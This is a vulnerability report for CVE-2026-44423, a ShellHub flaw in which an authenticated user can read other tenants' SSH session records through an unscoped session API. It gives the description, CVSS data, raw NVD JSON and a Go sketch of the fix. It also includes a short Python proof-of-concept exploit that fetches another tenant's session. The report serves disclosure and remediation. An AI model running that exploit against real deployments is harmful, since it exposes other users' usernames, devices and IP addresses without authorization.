Security Vulnerability Report
CVE-2026-44423 CVSS 6.5 MEDIUM


Published: 2026-05-13 22:16:44
Last Modified: 2026-05-14 16:44:56

Description

ShellHub is a centralized SSH gateway. Prior to 0.24.2, GET /api/sessions/:uid returns the full session object for any authenticated caller, without scoping by the caller's tenant. An authenticated user can read session records (SSH username, device UID, remote IP, terminal type, authenticated flag, timestamps) belonging to any other namespace. This vulnerability is fixed in 0.24.2.
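The defect described above, as an added illustration that is not ShellHub's code: a session lookup keyed by UID alone (the pre-0.24.2 behaviour) beside the tenant-scoped form that fixes it. The Session fields, the in-memory store and the tenant names are constructed assumptions.

```go
package main

import (
	"errors"
	"fmt"
)

// Session carries the fields the advisory says were exposed; TenantID is the
// owning namespace (names are assumptions, not ShellHub's own types).
type Session struct {
	UID, TenantID, Username, DeviceUID, RemoteIP string
	Authenticated                                bool
}

// One error for both "missing" and "not yours", so the response cannot be
// used to probe whether a foreign session UID exists.
var ErrNotFound = errors.New("session not found")
// Constructed sample store: one session in each of two namespaces.
var sessions = map[string]Session{
	"sess-a1": {UID: "sess-a1", TenantID: "tenant-a", Username: "alice", DeviceUID: "dev-a", RemoteIP: "203.0.113.10", Authenticated: true},
	"sess-b1": {UID: "sess-b1", TenantID: "tenant-b", Username: "bob", DeviceUID: "dev-b", RemoteIP: "198.51.100.7", Authenticated: true},
}

// getSessionUnscoped models the pre-0.24.2 behaviour: the lookup is keyed by
// UID alone, so any authenticated caller can read any namespace's session.
func getSessionUnscoped(uid string) (Session, error) {
	s, ok := sessions[uid]
	if !ok {
		return Session{}, ErrNotFound
	}
	return s, nil
}

// getSessionScoped is the hardened form: the caller's tenant, taken from the
// validated auth token rather than from the request, is part of the lookup.
func getSessionScoped(callerTenant, uid string) (Session, error) {
	s, ok := sessions[uid]
	if !ok || s.TenantID != callerTenant {
		return Session{}, ErrNotFound
	}
	return s, nil
}

func main() {
	_, err := getSessionUnscoped("sess-b1")
	fmt.Println("tenant-a caller reads tenant-b session, unscoped:", err == nil) // true
	_, err = getSessionScoped("tenant-a", "sess-b1")
	fmt.Println("tenant-a caller reads tenant-b session, scoped:  ", err == nil) // false
}
```

Returning the same "not found" error for a missing UID and for another tenant's UID keeps the scoped endpoint from leaking which session identifiers exist.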

CVSS Details

CVSS Score: 6.5
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

No configuration data available.

ShellHub < 0.24.2

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import requests

# Target URL of the vulnerable ShellHub instance
target_url = "https://<shellhub-domain>/api/sessions/<victim_session_uid>"

# Headers with a valid authentication token from a low-privileged user
headers = {
    "Authorization": "Bearer <attacker_valid_token>",
    "Content-Type": "application/json",
}

# Send the GET request to access another tenant's session
# The application fails to check if the attacker's tenant owns this session_uid
response = requests.get(target_url, headers=headers)

if response.status_code == 200:
    data = response.json()
    print("[+] Exploit successful!")
    print(f"SSH Username: {data.get('username')}")
    print(f"Device UID: {data.get('device_uid')}")
    print(f"Remote IP: {data.get('remote_ip')}")
else:
    print(f"[-] Request failed with status code: {response.status_code}")
```

References

GitHub Security Advisory GHSA-9w9c-9w8m-w89q: https://github.com/shellhub-io/shellhub/security/advisories/GHSA-9w9c-9w8m-w89q
Weakness: CWE-639

Raw JSON Data

```json
{
  "cve": {
    "id": "CVE-2026-44423",
    "sourceIdentifier": "[email protected]",
    "published": "2026-05-13T22:16:44.103",
    "lastModified": "2026-05-14T16:44:55.820",
    "vulnStatus": "Undergoing Analysis",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "ShellHub is a centralized SSH gateway. Prior to 0.24.2, GET /api/sessions/:uid returns the full session object for any authenticated caller, without scoping by the caller's tenant. An authenticated user can read session records (SSH username, device UID, remote IP, terminal type, authenticated flag, timestamps) belonging to any other namespace. This vulnerability is fixed in 0.24.2."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
            "baseScore": 6.5,
            "baseSeverity": "MEDIUM",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "LOW",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "NONE",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 2.8,
          "impactScore": 3.6
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Secondary",
        "description": [
          {
            "lang": "en",
            "value": "CWE-639"
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://github.com/shellhub-io/shellhub/security/advisories/GHSA-9w9c-9w8m-w89q",
        "source": "[email protected]"
      },
      {
        "url": "https://github.com/shellhub-io/shellhub/security/advisories/GHSA-9w9c-9w8m-w89q",
        "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0"
      }
    ]
  }
}
```